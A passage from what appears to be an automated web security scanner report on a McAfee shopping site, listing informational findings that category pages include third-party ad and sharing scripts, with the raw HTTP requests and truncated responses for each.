Cookie: s_ev8=%5B%5B%27performics%27%2C%271292625325755%27%5D%2C%5B%27mcafee%27%2C%271292705389777%27%5D%5D; HRntm=aff=0-0&cid=78228&pple=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&inur=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&sbo=iq5nNK%2bISQc78yUmSkAv9A%3d%3d; langid=1; __utmz=192341800.1293269982.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); AffID=0-0; Locale=EN-US; SessionInfo=AffiliateId=0&CampaignId=78228; CampaignId=78228; WT_FPC=id=248766ad0242431403d1292618077174:lv=1292698189456:ss=1292698189456; IS3_History=1292380167-1-10_3--1__3_; isvt_visitor=cWHERgoBC2YAACzPVo0AAAAAABdJCVeeyjyDAG; HPrst=cur=56&gu=e4753ddf-e101-4402-bd18-d2f5270f717b&loc=EN-US; s_vi=[CS]v1|2685F2A8051D150D-6000012E2000538B[CE]; s_nr=1292705389773-Repeat; __utma=192341800.102881162.1293269981.1293269981.1293269981.1; lUsrCtxSession=%3cUserContext%3e%3cAffID%3e0%3c%2fAffID%3e%3cAffBuildID%3e0%3c%2fAffBuildID%3e%3c%2fUserContext%3e; session%5Fdata=%3cSessionData%3e%0d%0a++%3ctempfrlu%3e%3c%2ftempfrlu%3e%0d%0a++%3cwt_source%3eOther%3c%2fwt_source%3e%0d%0a%3c%2fSessionData%3e; __utmc=192341800; __utmb=192341800.8.10.1293269981; user=id=1293248423528-1-dMZf; SiteID=1; Currency=56;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Server: McAfeeSecure
Set-Cookie: user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:49:35 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Date: Sat, 25 Dec 2010 03:49:35 GMT
Content-Length: 68102

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>
<head>

<title>View Storage Media at McAfee Secure Shopping - Search, Discover &
...[SNIP]...
</a>
<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"> </script>
...[SNIP]...

3.133. http://secureshopping.mcafee.com/browse/computers/cables-adapters/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/computers/cables-adapters/

Issue detail

The response dynamically includes the following scripts from other domains:

http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/200/addthis_widget.js

Request

GET /browse/computers/cables-adapters/ HTTP/1.1
Host: secureshopping.mcafee.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_ev8=%5B%5B%27performics%27%2C%271292625325755%27%5D%2C%5B%27mcafee%27%2C%271292705389777%27%5D%5D; HRntm=aff=0-0&cid=78228&pple=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&inur=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&sbo=iq5nNK%2bISQc78yUmSkAv9A%3d%3d; langid=1; __utmz=192341800.1293269982.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); AffID=0-0; Locale=EN-US; SessionInfo=AffiliateId=0&CampaignId=78228; CampaignId=78228; WT_FPC=id=248766ad0242431403d1292618077174:lv=1292698189456:ss=1292698189456; IS3_History=1292380167-1-10_3--1__3_; isvt_visitor=cWHERgoBC2YAACzPVo0AAAAAABdJCVeeyjyDAG; HPrst=cur=56&gu=e4753ddf-e101-4402-bd18-d2f5270f717b&loc=EN-US; s_vi=[CS]v1|2685F2A8051D150D-6000012E2000538B[CE]; s_nr=1292705389773-Repeat; __utma=192341800.102881162.1293269981.1293269981.1293269981.1; lUsrCtxSession=%3cUserContext%3e%3cAffID%3e0%3c%2fAffID%3e%3cAffBuildID%3e0%3c%2fAffBuildID%3e%3c%2fUserContext%3e; session%5Fdata=%3cSessionData%3e%0d%0a++%3ctempfrlu%3e%3c%2ftempfrlu%3e%0d%0a++%3cwt_source%3eOther%3c%2fwt_source%3e%0d%0a%3c%2fSessionData%3e; __utmc=192341800; __utmb=192341800.8.10.1293269981; user=id=1293248423528-1-dMZf; SiteID=1; Currency=56;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Server: McAfeeSecure
Set-Cookie: user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:49:36 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Date: Sat, 25 Dec 2010 03:49:36 GMT
Content-Length: 63775

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>
<head>

<title>View Cables & Adapters at McAfee Secure Shopping - Search, Discov
...[SNIP]...
</a>
<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"> </script>
...[SNIP]...

3.134. http://secureshopping.mcafee.com/browse/computers/cpu,-chassis-components/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/computers/cpu,-chassis-components/

Issue detail

The response dynamically includes the following scripts from other domains:

http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/200/addthis_widget.js

Request

GET /browse/computers/cpu,-chassis-components/ HTTP/1.1
Host: secureshopping.mcafee.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_ev8=%5B%5B%27performics%27%2C%271292625325755%27%5D%2C%5B%27mcafee%27%2C%271292705389777%27%5D%5D; HRntm=aff=0-0&cid=78228&pple=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&inur=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&sbo=iq5nNK%2bISQc78yUmSkAv9A%3d%3d; langid=1; __utmz=192341800.1293269982.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); AffID=0-0; Locale=EN-US; SessionInfo=AffiliateId=0&CampaignId=78228; CampaignId=78228; WT_FPC=id=248766ad0242431403d1292618077174:lv=1292698189456:ss=1292698189456; IS3_History=1292380167-1-10_3--1__3_; isvt_visitor=cWHERgoBC2YAACzPVo0AAAAAABdJCVeeyjyDAG; HPrst=cur=56&gu=e4753ddf-e101-4402-bd18-d2f5270f717b&loc=EN-US; s_vi=[CS]v1|2685F2A8051D150D-6000012E2000538B[CE]; s_nr=1292705389773-Repeat; __utma=192341800.102881162.1293269981.1293269981.1293269981.1; lUsrCtxSession=%3cUserContext%3e%3cAffID%3e0%3c%2fAffID%3e%3cAffBuildID%3e0%3c%2fAffBuildID%3e%3c%2fUserContext%3e; session%5Fdata=%3cSessionData%3e%0d%0a++%3ctempfrlu%3e%3c%2ftempfrlu%3e%0d%0a++%3cwt_source%3eOther%3c%2fwt_source%3e%0d%0a%3c%2fSessionData%3e; __utmc=192341800; __utmb=192341800.8.10.1293269981; user=id=1293248423528-1-dMZf; SiteID=1; Currency=56;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Server: McAfeeSecure
Set-Cookie: user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:49:36 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Date: Sat, 25 Dec 2010 03:49:36 GMT
Content-Length: 57210

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>
<head>

<title>View CPU, Chassis & Components at McAfee Secure Shopping - Search
...[SNIP]...
</a>
<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"> </script>
...[SNIP]...

3.135. http://secureshopping.mcafee.com/browse/computers/cpu,-chassis-components/cases/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/computers/cpu,-chassis-components/cases/

Issue detail

The response dynamically includes the following scripts from other domains:

http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/200/addthis_widget.js

Request

GET /browse/computers/cpu,-chassis-components/cases/ HTTP/1.1
Host: secureshopping.mcafee.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_ev8=%5B%5B%27performics%27%2C%271292625325755%27%5D%2C%5B%27mcafee%27%2C%271292705389777%27%5D%5D; HRntm=aff=0-0&cid=78228&pple=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&inur=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&sbo=iq5nNK%2bISQc78yUmSkAv9A%3d%3d; langid=1; __utmz=192341800.1293269982.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); AffID=0-0; Locale=EN-US; SessionInfo=AffiliateId=0&CampaignId=78228; CampaignId=78228; WT_FPC=id=248766ad0242431403d1292618077174:lv=1292698189456:ss=1292698189456; IS3_History=1292380167-1-10_3--1__3_; isvt_visitor=cWHERgoBC2YAACzPVo0AAAAAABdJCVeeyjyDAG; HPrst=cur=56&gu=e4753ddf-e101-4402-bd18-d2f5270f717b&loc=EN-US; s_vi=[CS]v1|2685F2A8051D150D-6000012E2000538B[CE]; s_nr=1292705389773-Repeat; __utma=192341800.102881162.1293269981.1293269981.1293269981.1; lUsrCtxSession=%3cUserContext%3e%3cAffID%3e0%3c%2fAffID%3e%3cAffBuildID%3e0%3c%2fAffBuildID%3e%3c%2fUserContext%3e; session%5Fdata=%3cSessionData%3e%0d%0a++%3ctempfrlu%3e%3c%2ftempfrlu%3e%0d%0a++%3cwt_source%3eOther%3c%2fwt_source%3e%0d%0a%3c%2fSessionData%3e; __utmc=192341800; __utmb=192341800.8.10.1293269981; user=id=1293248423528-1-dMZf; SiteID=1; Currency=56;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Server: McAfeeSecure
Set-Cookie: user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:49:38 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Date: Sat, 25 Dec 2010 03:49:38 GMT
Content-Length: 62384

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>
<head>

<title>View Cases at McAfee Secure Shopping - Search, Discover & Compare
...[SNIP]...
</a>
<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"> </script>
...[SNIP]...

3.136. http://secureshopping.mcafee.com/browse/computers/cpu,-chassis-components/cpu/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/computers/cpu,-chassis-components/cpu/

Issue detail

The response dynamically includes the following scripts from other domains:

http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/200/addthis_widget.js

Request

GET /browse/computers/cpu,-chassis-components/cpu/ HTTP/1.1
Host: secureshopping.mcafee.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_ev8=%5B%5B%27performics%27%2C%271292625325755%27%5D%2C%5B%27mcafee%27%2C%271292705389777%27%5D%5D; HRntm=aff=0-0&cid=78228&pple=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&inur=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&sbo=iq5nNK%2bISQc78yUmSkAv9A%3d%3d; langid=1; __utmz=192341800.1293269982.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); AffID=0-0; Locale=EN-US; SessionInfo=AffiliateId=0&CampaignId=78228; CampaignId=78228; WT_FPC=id=248766ad0242431403d1292618077174:lv=1292698189456:ss=1292698189456; IS3_History=1292380167-1-10_3--1__3_; isvt_visitor=cWHERgoBC2YAACzPVo0AAAAAABdJCVeeyjyDAG; HPrst=cur=56&gu=e4753ddf-e101-4402-bd18-d2f5270f717b&loc=EN-US; s_vi=[CS]v1|2685F2A8051D150D-6000012E2000538B[CE]; s_nr=1292705389773-Repeat; __utma=192341800.102881162.1293269981.1293269981.1293269981.1; lUsrCtxSession=%3cUserContext%3e%3cAffID%3e0%3c%2fAffID%3e%3cAffBuildID%3e0%3c%2fAffBuildID%3e%3c%2fUserContext%3e; session%5Fdata=%3cSessionData%3e%0d%0a++%3ctempfrlu%3e%3c%2ftempfrlu%3e%0d%0a++%3cwt_source%3eOther%3c%2fwt_source%3e%0d%0a%3c%2fSessionData%3e; __utmc=192341800; __utmb=192341800.8.10.1293269981; user=id=1293248423528-1-dMZf; SiteID=1; Currency=56;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Server: McAfeeSecure
Set-Cookie: user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:49:45 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Date: Sat, 25 Dec 2010 03:49:45 GMT
Content-Length: 57010

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>
<head>

<title>View CPU at McAfee Secure Shopping - Search, Discover & Compare P
...[SNIP]...
</a>
<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"> </script>
...[SNIP]...

3.137. http://secureshopping.mcafee.com/browse/computers/cpu,-chassis-components/motherboards/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/computers/cpu,-chassis-components/motherboards/

Issue detail

The response dynamically includes the following scripts from other domains:

http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/200/addthis_widget.js

Request

GET /browse/computers/cpu,-chassis-components/motherboards/ HTTP/1.1
Host: secureshopping.mcafee.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_ev8=%5B%5B%27performics%27%2C%271292625325755%27%5D%2C%5B%27mcafee%27%2C%271292705389777%27%5D%5D; HRntm=aff=0-0&cid=78228&pple=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&inur=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&sbo=iq5nNK%2bISQc78yUmSkAv9A%3d%3d; langid=1; __utmz=192341800.1293269982.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); AffID=0-0; Locale=EN-US; SessionInfo=AffiliateId=0&CampaignId=78228; CampaignId=78228; WT_FPC=id=248766ad0242431403d1292618077174:lv=1292698189456:ss=1292698189456; IS3_History=1292380167-1-10_3--1__3_; isvt_visitor=cWHERgoBC2YAACzPVo0AAAAAABdJCVeeyjyDAG; HPrst=cur=56&gu=e4753ddf-e101-4402-bd18-d2f5270f717b&loc=EN-US; s_vi=[CS]v1|2685F2A8051D150D-6000012E2000538B[CE]; s_nr=1292705389773-Repeat; __utma=192341800.102881162.1293269981.1293269981.1293269981.1; lUsrCtxSession=%3cUserContext%3e%3cAffID%3e0%3c%2fAffID%3e%3cAffBuildID%3e0%3c%2fAffBuildID%3e%3c%2fUserContext%3e; session%5Fdata=%3cSessionData%3e%0d%0a++%3ctempfrlu%3e%3c%2ftempfrlu%3e%0d%0a++%3cwt_source%3eOther%3c%2fwt_source%3e%0d%0a%3c%2fSessionData%3e; __utmc=192341800; __utmb=192341800.8.10.1293269981; user=id=1293248423528-1-dMZf; SiteID=1; Currency=56;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Server: McAfeeSecure
Set-Cookie: user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:49:46 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Date: Sat, 25 Dec 2010 03:49:46 GMT
Content-Length: 57616

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>
<head>

<title>View Motherboards at McAfee Secure Shopping - Search, Discover &
...[SNIP]...
</a>
<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"> </script>
...[SNIP]...

3.138. http://secureshopping.mcafee.com/browse/computers/desktops/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/computers/desktops/

Issue detail

The response dynamically includes the following scripts from other domains:

http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/200/addthis_widget.js

Request

GET /browse/computers/desktops/ HTTP/1.1
Host: secureshopping.mcafee.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_ev8=%5B%5B%27performics%27%2C%271292625325755%27%5D%2C%5B%27mcafee%27%2C%271292705389777%27%5D%5D; HRntm=aff=0-0&cid=78228&pple=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&inur=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&sbo=iq5nNK%2bISQc78yUmSkAv9A%3d%3d; langid=1; __utmz=192341800.1293269982.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); AffID=0-0; Locale=EN-US; SessionInfo=AffiliateId=0&CampaignId=78228; CampaignId=78228; WT_FPC=id=248766ad0242431403d1292618077174:lv=1292698189456:ss=1292698189456; IS3_History=1292380167-1-10_3--1__3_; isvt_visitor=cWHERgoBC2YAACzPVo0AAAAAABdJCVeeyjyDAG; HPrst=cur=56&gu=e4753ddf-e101-4402-bd18-d2f5270f717b&loc=EN-US; s_vi=[CS]v1|2685F2A8051D150D-6000012E2000538B[CE]; s_nr=1292705389773-Repeat; __utma=192341800.102881162.1293269981.1293269981.1293269981.1; lUsrCtxSession=%3cUserContext%3e%3cAffID%3e0%3c%2fAffID%3e%3cAffBuildID%3e0%3c%2fAffBuildID%3e%3c%2fUserContext%3e; session%5Fdata=%3cSessionData%3e%0d%0a++%3ctempfrlu%3e%3c%2ftempfrlu%3e%0d%0a++%3cwt_source%3eOther%3c%2fwt_source%3e%0d%0a%3c%2fSessionData%3e; __utmc=192341800; __utmb=192341800.8.10.1293269981; user=id=1293248423528-1-dMZf; SiteID=1; Currency=56;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Server: McAfeeSecure
Set-Cookie: user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:49:47 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Date: Sat, 25 Dec 2010 03:49:47 GMT
Content-Length: 58884

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>
<head>

<title>View Desktops at McAfee Secure Shopping - Search, Discover & Comp
...[SNIP]...
</a>
<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"> </script>
...[SNIP]...

3.139. http://secureshopping.mcafee.com/browse/computers/graphics/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/computers/graphics/

Issue detail

The response dynamically includes the following scripts from other domains:

http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/200/addthis_widget.js

Request

GET /browse/computers/graphics/ HTTP/1.1
Host: secureshopping.mcafee.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_ev8=%5B%5B%27performics%27%2C%271292625325755%27%5D%2C%5B%27mcafee%27%2C%271292705389777%27%5D%5D; HRntm=aff=0-0&cid=78228&pple=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&inur=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&sbo=iq5nNK%2bISQc78yUmSkAv9A%3d%3d; langid=1; __utmz=192341800.1293269982.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); AffID=0-0; Locale=EN-US; SessionInfo=AffiliateId=0&CampaignId=78228; CampaignId=78228; WT_FPC=id=248766ad0242431403d1292618077174:lv=1292698189456:ss=1292698189456; IS3_History=1292380167-1-10_3--1__3_; isvt_visitor=cWHERgoBC2YAACzPVo0AAAAAABdJCVeeyjyDAG; HPrst=cur=56&gu=e4753ddf-e101-4402-bd18-d2f5270f717b&loc=EN-US; s_vi=[CS]v1|2685F2A8051D150D-6000012E2000538B[CE]; s_nr=1292705389773-Repeat; __utma=192341800.102881162.1293269981.1293269981.1293269981.1; lUsrCtxSession=%3cUserContext%3e%3cAffID%3e0%3c%2fAffID%3e%3cAffBuildID%3e0%3c%2fAffBuildID%3e%3c%2fUserContext%3e; session%5Fdata=%3cSessionData%3e%0d%0a++%3ctempfrlu%3e%3c%2ftempfrlu%3e%0d%0a++%3cwt_source%3eOther%3c%2fwt_source%3e%0d%0a%3c%2fSessionData%3e; __utmc=192341800; __utmb=192341800.8.10.1293269981; user=id=1293248423528-1-dMZf; SiteID=1; Currency=56;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Server: McAfeeSecure
Set-Cookie: user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:49:48 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Date: Sat, 25 Dec 2010 03:49:48 GMT
Content-Length: 59807

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>
<head>

<title>View Graphics at McAfee Secure Shopping - Search, Discover & Comp
...[SNIP]...
</a>
<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"> </script>
...[SNIP]...

3.140. http://secureshopping.mcafee.com/browse/computers/handhelds-pda/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/computers/handhelds-pda/

Issue detail

The response dynamically includes the following scripts from other domains:

http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/200/addthis_widget.js

Request

GET /browse/computers/handhelds-pda/ HTTP/1.1
Host: secureshopping.mcafee.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_ev8=%5B%5B%27performics%27%2C%271292625325755%27%5D%2C%5B%27mcafee%27%2C%271292705389777%27%5D%5D; HRntm=aff=0-0&cid=78228&pple=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&inur=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&sbo=iq5nNK%2bISQc78yUmSkAv9A%3d%3d; langid=1; __utmz=192341800.1293269982.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); AffID=0-0; Locale=EN-US; SessionInfo=AffiliateId=0&CampaignId=78228; CampaignId=78228; WT_FPC=id=248766ad0242431403d1292618077174:lv=1292698189456:ss=1292698189456; IS3_History=1292380167-1-10_3--1__3_; isvt_visitor=cWHERgoBC2YAACzPVo0AAAAAABdJCVeeyjyDAG; HPrst=cur=56&gu=e4753ddf-e101-4402-bd18-d2f5270f717b&loc=EN-US; s_vi=[CS]v1|2685F2A8051D150D-6000012E2000538B[CE]; s_nr=1292705389773-Repeat; __utma=192341800.102881162.1293269981.1293269981.1293269981.1; lUsrCtxSession=%3cUserContext%3e%3cAffID%3e0%3c%2fAffID%3e%3cAffBuildID%3e0%3c%2fAffBuildID%3e%3c%2fUserContext%3e; session%5Fdata=%3cSessionData%3e%0d%0a++%3ctempfrlu%3e%3c%2ftempfrlu%3e%0d%0a++%3cwt_source%3eOther%3c%2fwt_source%3e%0d%0a%3c%2fSessionData%3e; __utmc=192341800; __utmb=192341800.8.10.1293269981; user=id=1293248423528-1-dMZf; SiteID=1; Currency=56;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Server: McAfeeSecure
Set-Cookie: user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:49:49 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Date: Sat, 25 Dec 2010 03:49:49 GMT
Content-Length: 51723

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>
<head>

<title>View Handhelds/PDA at McAfee Secure Shopping - Search, Discover &
...[SNIP]...
</a>
<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"> </script>
...[SNIP]...

3.141. http://secureshopping.mcafee.com/browse/computers/input-devices/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/computers/input-devices/

Issue detail

The response dynamically includes the following scripts from other domains:

http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/200/addthis_widget.js

Request

GET /browse/computers/input-devices/ HTTP/1.1
Host: secureshopping.mcafee.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_ev8=%5B%5B%27performics%27%2C%271292625325755%27%5D%2C%5B%27mcafee%27%2C%271292705389777%27%5D%5D; HRntm=aff=0-0&cid=78228&pple=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&inur=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&sbo=iq5nNK%2bISQc78yUmSkAv9A%3d%3d; langid=1; __utmz=192341800.1293269982.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); AffID=0-0; Locale=EN-US; SessionInfo=AffiliateId=0&CampaignId=78228; CampaignId=78228; WT_FPC=id=248766ad0242431403d1292618077174:lv=1292698189456:ss=1292698189456; IS3_History=1292380167-1-10_3--1__3_; isvt_visitor=cWHERgoBC2YAACzPVo0AAAAAABdJCVeeyjyDAG; HPrst=cur=56&gu=e4753ddf-e101-4402-bd18-d2f5270f717b&loc=EN-US; s_vi=[CS]v1|2685F2A8051D150D-6000012E2000538B[CE]; s_nr=1292705389773-Repeat; __utma=192341800.102881162.1293269981.1293269981.1293269981.1; lUsrCtxSession=%3cUserContext%3e%3cAffID%3e0%3c%2fAffID%3e%3cAffBuildID%3e0%3c%2fAffBuildID%3e%3c%2fUserContext%3e; session%5Fdata=%3cSessionData%3e%0d%0a++%3ctempfrlu%3e%3c%2ftempfrlu%3e%0d%0a++%3cwt_source%3eOther%3c%2fwt_source%3e%0d%0a%3c%2fSessionData%3e; __utmc=192341800; __utmb=192341800.8.10.1293269981; user=id=1293248423528-1-dMZf; SiteID=1; Currency=56;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Server: McAfeeSecure
Set-Cookie: user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:49:49 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Date: Sat, 25 Dec 2010 03:49:49 GMT
Content-Length: 59912

